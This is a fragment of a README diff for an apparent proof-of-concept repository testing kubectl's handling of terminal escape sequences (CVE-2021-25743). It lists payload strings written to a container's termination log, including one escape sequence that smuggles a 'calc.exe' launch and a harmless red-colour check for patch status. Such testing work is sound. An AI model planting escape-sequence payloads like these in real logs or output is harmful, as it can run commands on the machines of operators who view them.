dgl/houdini-kubectl-poc/README.md

   `"\e]9;9;/" calc.exe "o /\e\\"`

+- Some colour (not a terminal vulnerability, test for CVE-2021-25743 alone)

+  `"\e[31mIf you see this in red your kubectl is not fixed against CVE-2021-25743\e[m"`

 The list above contains escape sequences in C-style strings, as this section of the readme is expanded and written to /dev/termination-log, see [Dockerfile](Dockerfile).